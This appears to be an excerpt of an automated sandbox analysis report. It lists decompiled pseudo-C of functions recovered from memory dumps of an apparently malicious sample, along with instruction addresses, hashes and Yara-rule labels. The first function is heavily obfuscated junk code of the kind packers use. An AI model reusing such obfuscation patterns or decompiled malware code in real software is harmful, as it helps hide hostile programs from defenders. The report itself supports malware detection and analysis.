										do {
											do {
												do {
													L1:
													 *0xafc4e909 =  *0xafc4e909 << 0x95;
													 *0x45a888cf =  *0x45a888cf + _t53;
													_pop( *0x2e0d36a1);
													_t28 = _t28 +  *0xf04a47fa;
												} while (_t28 < 0);
												asm("rol dword [0xcc521fea], 0x1e");
												_push(_t34);
												asm("rcr dword [0xd385ee8f], 0x16");
												asm("rol dword [0x570d919], 0xca");
												 *0xa0af9322 =  *0xa0af9322 >> 0x79;
												asm("adc edx, [0x29c07b16]");
												 *0x28bb49b4 = (_t28 | 0x000000b2) + 0xcc203693;
												 *0xc756d085 = _t53;
												_push( *0xc756d085);
												_t23 = 0x32 -  *0xabfaad36 -  *0xdc1dc510;
												 *0xad0ae102 =  *0xad0ae102 &  *0x12fa4fcb;
												_t34 = 0x4b808c0e;
												_push( *0xbae23bf7);
												_t61 = 0xc86709d3;
												_t28 =  *0x536beec;
												 *0xc56a0a18 =  *0xc56a0a18 >> 0xf3;
												_t48 = (_t48 | 0x6822b272) -  *0x5dd48cd + 2;
												_t53 =  *0xad3eb6b * 0x909e;
											} while (_t53 == 0);
											 *0x60b4ef74 =  *0x60b4ef74 << 0x4a;
											 *0xfd3ea67 =  *0xfd3ea67 + 0x4b808c0e;
											asm("stosd");
											_t24 = _t23 - 1;
											_t28 = (_t28 |  *0xe22f6564) & 0xb5541205;
										} while (_t28 > 0);
										_t53 =  *0x8a83ea7f * 0x2af4;
										asm("adc [0x6cd8c587], edi");
									} while (_t53 >= 0);
									_t61 =  *0xc5a85e71;
									 *0xc5a85e71 = 0xc86709d3;
									_push( *0x3e2ba59b);
									 *0x246ca9a3 =  *0x246ca9a3 | 0x5c796b83;
									 *0x3b2544bf =  *0x3b2544bf >> 0x99;
									_t34 = 0x4b808c0e +  *0x9237aa96;
									asm("sbb ecx, [0x99ebf6ec]");
									asm("adc esi, 0x3f59e8b8");
									_push(_t28);
									asm("sbb ebp, [0xaa5c3001]");
									asm("adc edx, [0xb5d75ea9]");
									 *0xd5930688 =  *0xd5930688 - 0x5c796b84;
								} while (( *0x8efe5ebc & _t24) <= 0);
								_t25 = _t24 & 0x5e238776;
								asm("adc edi, [0x507d7b26]");
								_t48 =  *0x5d182001;
								asm("ror dword [0xa5696b1f], 0xa5");
								asm("sbb [0xdee53639], esp");
								_t53 = _t53 |  *0x9da8de68;
								_t28 = 0x0000002c |  *0xe8323dbc;
								asm("scasb");
								_t34 = _t34 + 1;
							} while (0x4b808c0e < 0);
							_t26 = _t25 ^ 0x00000086;
							 *0xa2302b1f =  *0xa2302b1f & _t61;
							_t12 = _t28 &  *0xa967ff9e;
							_t28 =  *0xa6efbdba;
							 *0xa6efbdba = _t12;
							_t48 = _t48 ^  *0x2e3f66ee;
							asm("movsw");
							_pop(_t53);
						} while (0x5c796b83 != 0);
						asm("sbb esi, [0x19794f75]");
						 *0xfe510fca = 0x5c796b83;
						asm("stosd");
						_t52 =  *0xfe4a1fcd;
						 *0x66368e91 =  *0x66368e91 + _t52;
						asm("adc dl, 0xb0");
						asm("adc edx, [0x5e9f141b]");
						_t34 = (_t34 &  *0xb6504bfa) + 1;
						 *0xcb5f57f0 =  *0xcb5f57f0 ^ 0x4b808c0e;
						asm("rol dword [0x4362de1b], 0xd0");
						_push(0x4b808c0e);
						_t28 = _t28 | 0x000000e4;
						 *0xd5d43784 =  *0xd5d43784 ^  *0xfe510fca;
						_t48 = _t52 |  *0xf654d60b;
					} while (_t48 >= 0);
					_push(_t28);
					asm("rcr dword [0xe6959d27], 0x96");
					return _t26 + 1;
				} else {
					__esi = __esi &  *0xa62f6bf8;
					__al = __al & 0x000000e4;
					 *0xa40ef18e =  *0xa40ef18e >> 0x1d;
					__esp = __esp - 0x1c790181;
					__ecx = 0x114c398c;
					 *0x558d1165 =  *0x558d1165 - __ebx;
					asm("adc esi, [0xb3575cea]");
					asm("sbb esi, [0x34f4cc6f]");
					asm("sbb [0xa6804e11], ecx");
					 *0xc8cb1561 = __esp;
					asm("ror dword [0x16e282fb], 0x24");
					__al = __al &  *0xda8e6a80;
					__ecx = __ecx ^ 0x340b34fd;
					asm("rol dword [0xdab83c9d], 0x48");
					 *0x3b3f16c5 =  *0x3b3f16c5 >> 0x7a;
					asm("adc ebx, 0x9596cb");
					__bl = __bl - 0xe3;
					_pop(__edx);
					return  *0xa5826a7f * 0x5421;
				}
			}












                                          0x0041da23
                                          0x0041da23
                                          0x0041da23
                                          0x0041da23
                                          0x0041da24
                                          0x0041da2a
                                          0x0041da30
                                          0x0041da37
                                          0x0041da3d
                                          0x0041da44
                                          0x0041da4a
                                          0x00000000
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041cfa9
                                          0x0041cfb7
                                          0x0041cfd2
                                          0x0041cfd3
                                          0x0041cfda
                                          0x0041cfec
                                          0x0041cff6
                                          0x0041d008
                                          0x0041d024
                                          0x0041d02a
                                          0x0041d031
                                          0x0041d037
                                          0x0041d03d
                                          0x0041d042
                                          0x0041d048
                                          0x0041d054
                                          0x0041d060
                                          0x0041d06d
                                          0x0041d06e
                                          0x0041d06e
                                          0x0041d07e
                                          0x0041d088
                                          0x0041d094
                                          0x0041d0a1
                                          0x0041d0a2
                                          0x0041d0a2
                                          0x0041d0ae
                                          0x0041d0b8
                                          0x0041d0b8
                                          0x0041d0c4
                                          0x0041d0c4
                                          0x0041d0ca
                                          0x0041d0d1
                                          0x0041d0d7
                                          0x0041d0de
                                          0x0041d0e4
                                          0x0041d0ea
                                          0x0041d0f0
                                          0x0041d0f1
                                          0x0041d0f7
                                          0x0041d0fd
                                          0x0041d103
                                          0x0041d10f
                                          0x0041d114
                                          0x0041d11c
                                          0x0041d122
                                          0x0041d12f
                                          0x0041d135
                                          0x0041d13b
                                          0x0041d14e
                                          0x0041d14f
                                          0x0041d14f
                                          0x0041d160
                                          0x0041d169
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d180
                                          0x0041d186
                                          0x0041d189
                                          0x0041d189
                                          0x0041d190
                                          0x0041d196
                                          0x0041d19c
                                          0x0041d19d
                                          0x0041d1a3
                                          0x0041d1af
                                          0x0041d1b2
                                          0x0041d1b8
                                          0x0041d1b9
                                          0x0041d1bf
                                          0x0041d1c6
                                          0x0041d1c7
                                          0x0041d1ca
                                          0x0041d1d0
                                          0x0041d1d0
                                          0x0041d1e6
                                          0x0041d1e8
                                          0x0041d1ef
                                          0x0041da50
                                          0x0041da60
                                          0x0041da66
                                          0x0041da68
                                          0x0041da79
                                          0x0041da84
                                          0x0041da85
                                          0x0041da8b
                                          0x0041da97
                                          0x0041da9d
                                          0x0041daa3
                                          0x0041daa9
                                          0x0041dab0
                                          0x0041dab6
                                          0x0041dabf
                                          0x0041dacc
                                          0x0041dad3
                                          0x0041dad9
                                          0x0041dadc
                                          0x0041dadd
                                          0x0041dadd

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 899ac53ff63474487c5379da3a323747dba67a5b49d0585f598ccaea57f10c0c
                                          • Instruction ID: 83f620df7274ad3ae2f0071d55e7e5d043871dfd0342484d855196c8009d28f9
                                          • Opcode Fuzzy Hash: 899ac53ff63474487c5379da3a323747dba67a5b49d0585f598ccaea57f10c0c
                                          • Instruction Fuzzy Hash: E5716772958381DFDB1ACF38D88A7413BB6F342324B08435ED5A1A32D5DB74255ACF89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CDBE9, Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E033CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E033ACC50(E033A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E033C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03478ED6(_t102, _t98);
						}
						_t76 = _v44;
						E033C2280(_t58, _v44);
						E033CDD82(_v44, _t102, _t98);
						E033CB944(_t102, _v5);
						return E033BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3498628; // 0x0
							_v28 = _t67;
							_t68 =  *0x349862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3498628; // 0x0
						_t105 = _v28;
						_t80 =  *0x349862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x346fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                          0x033cdbe9
                                          0x033cdbf2
                                          0x033cdbf7
                                          0x033cdbf9
                                          0x033cdbfc
                                          0x033cdc00
                                          0x033cdc03
                                          0x033cdc14
                                          0x033cdd54
                                          0x033cdd54
                                          0x033cdd54
                                          0x033cdc18
                                          0x033cdc1d
                                          0x033cdc1d
                                          0x033cdc32
                                          0x033cdc3b
                                          0x033cdc3e
                                          0x033cdc46
                                          0x033cdd5b
                                          0x033cdd62
                                          0x033cdd64
                                          0x033cdd67
                                          0x033cdd69
                                          0x033cdd6b
                                          0x033cdd6e
                                          0x033cdd70
                                          0x033cdd73
                                          0x033cdd73
                                          0x00000000
                                          0x033cdc4c
                                          0x033cdc4e
                                          0x03413ae3
                                          0x03413ae8
                                          0x03413aea
                                          0x033cdce7
                                          0x033cdce9
                                          0x033cdcec
                                          0x033cdcee
                                          0x033cdcf0
                                          0x033cdcf3
                                          0x033cdcf5
                                          0x03413af2
                                          0x03413af5
                                          0x03413af5
                                          0x033cdd06
                                          0x033cdd08
                                          0x033cdd0b
                                          0x033cdd12
                                          0x03413b08
                                          0x033cdd18
                                          0x033cdd18
                                          0x033cdd18
                                          0x033cdd20
                                          0x033cdd23
                                          0x03413b16
                                          0x03413b16
                                          0x033cdd29
                                          0x033cdd2d
                                          0x033cdd36
                                          0x033cdd40
                                          0x033cdd51
                                          0x033cdd51
                                          0x033cdc54
                                          0x033cdc59
                                          0x033cdc59
                                          0x033cdc5e
                                          0x033cdc5e
                                          0x033cdc63
                                          0x033cdc66
                                          0x033cdc6b
                                          0x033cdc78
                                          0x033cdc7b
                                          0x033cdc81
                                          0x033cdc81
                                          0x033cdc83
                                          0x033cdc89
                                          0x00000000
                                          0x00000000
                                          0x033cdd7b
                                          0x033cdd7b
                                          0x033cdc8f
                                          0x033cdc8f
                                          0x033cdc92
                                          0x033cdc99
                                          0x033cdc9f
                                          0x033cdca5
                                          0x033cdcaa
                                          0x033cdcaa
                                          0x033cdcb3
                                          0x033cdcb8
                                          0x033cdcbb
                                          0x033cdcc1
                                          0x033cdccf
                                          0x033cdcd2
                                          0x033cdcd5
                                          0x033cdcd7
                                          0x033cdcda
                                          0x033cdcdc
                                          0x033cdcdc
                                          0x033cdce2
                                          0x033cdce4
                                          0x00000000
                                          0x033cdce4

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99537caab42b8465e5a1305f17e0a68d7a579d81f1a73ea7688086eab9f556ad
                                          • Instruction ID: b6cce38a10cf9dafe44396b0e70bb3277ac6f4ac756fab1bfdf63799ef9a9fa2
                                          • Opcode Fuzzy Hash: 99537caab42b8465e5a1305f17e0a68d7a579d81f1a73ea7688086eab9f556ad
                                          • Instruction Fuzzy Hash: 9F516975E00685DBCB14DF68C4D0AAEBBF9BF48310F24816EE555AB344EB71AD44CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033BEF40, Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E033BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E033A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E033A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                          0x033bef4b
                                          0x033bef4d
                                          0x033bef57
                                          0x033bf0bd
                                          0x033bf0c2
                                          0x033bf0d2
                                          0x033bf0d2
                                          0x033bf0c2
                                          0x033bef5d
                                          0x033bef5f
                                          0x033bef67
                                          0x033bef6a
                                          0x033bef6d
                                          0x033bef74
                                          0x033bef7f
                                          0x033bef82
                                          0x033bef82
                                          0x033bef86
                                          0x033bef88
                                          0x033bef8c
                                          0x033bef8f
                                          0x033bef8f
                                          0x033bef8f
                                          0x00000000
                                          0x033bef91
                                          0x033bef93
                                          0x033befc4
                                          0x033befc4
                                          0x033befc4
                                          0x033befca
                                          0x033befd0
                                          0x033bf0a6
                                          0x00000000
                                          0x00000000
                                          0x033bf0af
                                          0x0340bb06
                                          0x0340bb0a
                                          0x033bf0b5
                                          0x033bf0b5
                                          0x033bf0b5
                                          0x033bf0b5
                                          0x00000000
                                          0x033befd6
                                          0x033befd9
                                          0x033bf0de
                                          0x033bf0e2
                                          0x033befdf
                                          0x033befdf
                                          0x033befdf
                                          0x033befe5
                                          0x0340bafc
                                          0x0340bafc
                                          0x033befe5
                                          0x033befeb
                                          0x033befed
                                          0x033bf00f
                                          0x033bf011
                                          0x033bf01a
                                          0x033bf01d
                                          0x033bf021
                                          0x033bf028
                                          0x033bf029
                                          0x033bf029
                                          0x033bf02c
                                          0x00000000
                                          0x033bf02c
                                          0x033beff3
                                          0x033beff9
                                          0x033bf0ea
                                          0x033bf0ed
                                          0x033bf0ef
                                          0x00000000
                                          0x033bf0ef
                                          0x033bf003
                                          0x0340bb12
                                          0x033bf045
                                          0x033bf049
                                          0x033bf051
                                          0x033bf09e
                                          0x033bf0a0
                                          0x033bf0a0
                                          0x033bf09e
                                          0x033bf053
                                          0x033bf064
                                          0x033bf064
                                          0x033bf06b
                                          0x0340bb1a
                                          0x0340bb1a
                                          0x033bf071
                                          0x033bf071
                                          0x033bf07d
                                          0x033bf082
                                          0x033bf08f
                                          0x033bf08f
                                          0x033bf009
                                          0x033bf00d
                                          0x00000000
                                          0x033bf00d
                                          0x033befd0
                                          0x033bef97
                                          0x033befa5
                                          0x033befaa
                                          0x00000000
                                          0x033befac
                                          0x033befac
                                          0x033befac
                                          0x00000000
                                          0x033befb2
                                          0x033bf036
                                          0x033bf03a
                                          0x033bf040
                                          0x033bf090
                                          0x00000000
                                          0x033bf092
                                          0x033bf042
                                          0x00000000
                                          0x033bf042
                                          0x033befb7
                                          0x033befb9
                                          0x033befbc
                                          0x033befb0
                                          0x033befb0
                                          0x00000000
                                          0x033befbe
                                          0x033befbe
                                          0x033befc1
                                          0x00000000
                                          0x033befc1
                                          0x033befbc
                                          0x033befaa
                                          0x033bef91

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: d18bd0bca91b875139b3e13113f4021d28780336c8b8b0fea082817afc15e31b
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 7C51F030E04249EFDB24CB68D8C07EEFBB5EF05354F1882A9C65597B91C379A989C741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0347740D, Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0347740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E033FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E033EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L033C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L033C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E033EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L033C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                          0x0347740d
                                          0x0347740d
                                          0x03477412
                                          0x03477413
                                          0x03477416
                                          0x03477418
                                          0x0347741c
                                          0x0347741f
                                          0x03477422
                                          0x03477422
                                          0x03477428
                                          0x0347742a
                                          0x0347742a
                                          0x03477451
                                          0x03477432
                                          0x0347744f
                                          0x0347744f
                                          0x00000000
                                          0x03477434
                                          0x03477438
                                          0x03477443
                                          0x03477517
                                          0x03477517
                                          0x0347751a
                                          0x03477535
                                          0x03477520
                                          0x03477527
                                          0x0347752c
                                          0x03477531
                                          0x03477533
                                          0x00000000
                                          0x03477533
                                          0x00000000
                                          0x03477531
                                          0x0347754b
                                          0x0347754f
                                          0x0347755c
                                          0x0347755c
                                          0x0347755f
                                          0x03477560
                                          0x03477561
                                          0x03477562
                                          0x03477563
                                          0x03477568
                                          0x0347756a
                                          0x0347756c
                                          0x0347756d
                                          0x0347756d
                                          0x0347756f
                                          0x03477572
                                          0x03477574
                                          0x03477577
                                          0x0347757c
                                          0x0347757f
                                          0x00000000
                                          0x03477551
                                          0x03477551
                                          0x03477551
                                          0x03477553
                                          0x03477553
                                          0x03477449
                                          0x03477449
                                          0x0347744c
                                          0x0347744c
                                          0x00000000
                                          0x0347744c
                                          0x03477443
                                          0x0347750e
                                          0x03477514
                                          0x03477514
                                          0x03477455
                                          0x03477469
                                          0x0347746d
                                          0x00000000
                                          0x03477473
                                          0x03477473
                                          0x03477476
                                          0x03477480
                                          0x03477484
                                          0x0347748e
                                          0x03477493
                                          0x03477493
                                          0x03477496
                                          0x03477499
                                          0x034774a1
                                          0x034774b1
                                          0x034774b5
                                          0x00000000
                                          0x034774bb
                                          0x034774c1
                                          0x034774c1
                                          0x034774c4
                                          0x034774c5
                                          0x034774c6
                                          0x034774c7
                                          0x034774c8
                                          0x034774cd
                                          0x00000000
                                          0x034774d3
                                          0x034774d3
                                          0x034774d6
                                          0x034774d8
                                          0x034774db
                                          0x034774dd
                                          0x034774e0
                                          0x034774e7
                                          0x034774ee
                                          0x034774ee
                                          0x034774f4
                                          0x034774f9
                                          0x00000000
                                          0x034774fb
                                          0x034774fb
                                          0x034774fd
                                          0x03477500
                                          0x03477503
                                          0x03477505
                                          0x03477505
                                          0x034774f9
                                          0x00000000
                                          0x034774cd
                                          0x034774b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: 29a95cfdb0a6c79a4819c2cb0b0686a1eecf064a45f583c2d762f9a749101d0b
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: DF518B71600606EFCB26CF14C480AA6FBB9FF45344F59C5AAE908DF252E371E946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D2990, Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E033D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
